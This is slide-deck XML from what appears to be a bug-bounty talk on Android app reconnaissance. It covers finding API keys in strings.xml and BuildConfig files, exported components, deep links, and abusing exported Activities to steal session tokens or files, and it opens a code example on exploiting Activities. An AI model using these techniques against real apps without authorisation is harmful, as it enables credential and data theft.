                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find exported components, api keys, custom deep link schemas, schema endpoints etc.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resources.arsc/strings.xml </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Developers are encouraged to store strings in this file instead of hard coding in application.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>res/xml/file_paths.xml </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shows file save paths. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Search source code recursively</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            Especially BuildConfig files.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Google Shape;80;p16"/>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Android Recon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943675"/>
            <a:ext cx="8520600" cy="396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rPr>
              <a:t>Always verify if the key is read or read/write with api documentation examples.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Higher impact - Higher payout - Definite triage</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Solving the api key puzzle</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String references in Android Classes </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R.string.cmVzb3VyY2VzX3lv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmVzb3VyY2VzX3lv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is the string resource label.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="12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Find these string references in strings.xml</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>           &lt;string name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmVzb3VyY2VzX3lv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apikeyhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/string&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000080"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00008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Piece together the domains and required params in source code</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Google Shape;86;p17"/>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API Key Recon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999200"/>
            <a:ext cx="8520600" cy="3921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900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="202124"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Activities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> - Entry points for application interactions of components specified in AndroidManifest.xml. Has several states managed by callbacks such as onCreate().</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="202124"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>- Supplies additional functionality in the background. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="202124"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Broadcast receivers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>- Receives broadcasts from events of interest. Usually specified broadcasted intents in the broadcast receiver activity.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="202124"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Content providers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>- Helps applications manage access to stored data and ways to share data with other Android applications.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Google Shape;92;p18"/>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Exported Android Components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17750"/>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b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access to protected intents via exported Activities</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One exported activity that accepts a user provided intent can expose protected intents.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access to sensitive data via exported Activity</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Often combined with deep links to steal data via unvalidated parameters. Write session tokens to an external file.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access to sensitive files, stealing files, replacing imported files via exported Activities</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>external-files-path, external-path</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Public app directories</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Google Shape;98;p19"/>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How to Exploit Android Activities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0" y="1152475"/>
            <a:ext cx="9144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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="445588"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>exampleVulnerableMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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Intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>intent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a: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a:t>
            </a:r>
            <a:endParaRPr sz="14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400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>deeplinkIntent</a:t>
            </a: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a:t>
            </a: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Intent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
